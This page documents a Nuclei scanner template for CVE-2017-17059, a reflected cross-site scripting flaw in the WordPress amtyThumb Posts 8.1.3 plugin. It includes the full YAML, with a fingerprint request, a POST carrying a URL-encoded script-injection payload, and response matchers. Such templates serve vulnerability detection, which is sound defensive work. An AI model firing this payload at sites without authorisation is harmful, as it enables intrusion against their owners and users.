Skip to content
Nuclei Templates

WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting

ID: CVE-2017-17059

Severity: medium

Author: daffainfo

Tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project

Description

Section titled “Description”

WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.

YAML Source

Section titled “YAML Source”
id: CVE-2017-17059


info:
  name: WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser.
  remediation: |
    Update to the latest version of amtyThumb Posts plugin or apply the patch provided by the vendor.
  reference:
    - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
    - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-17059
    cwe-id: CWE-79
    epss-score: 0.00242
    epss-percentile: 0.642
    cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "amtythumb_project"
    product: amtythumb
    framework: wordpress
  tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project
flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        internal: true
        words:
          - 'Amty Thumb'
          - 'Tags:'
        condition: and
        case-insensitive: true


  - method: POST
    path:
      - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"


    body: "amty_hidden=1"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"


      - type: word
        part: header
        words:
          - text/html


      - type: status
        status:
          - 200
# digest: 490a00463044022018f371721ef83c2bd84da8fcea48adf5244154668d6aab6e95250e65c22689f502205966051e77b62fbd4e57fbc71e229bbd622c80fbe3c5c0f7e765882b5f79e3fb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-17059.yaml"

View on Github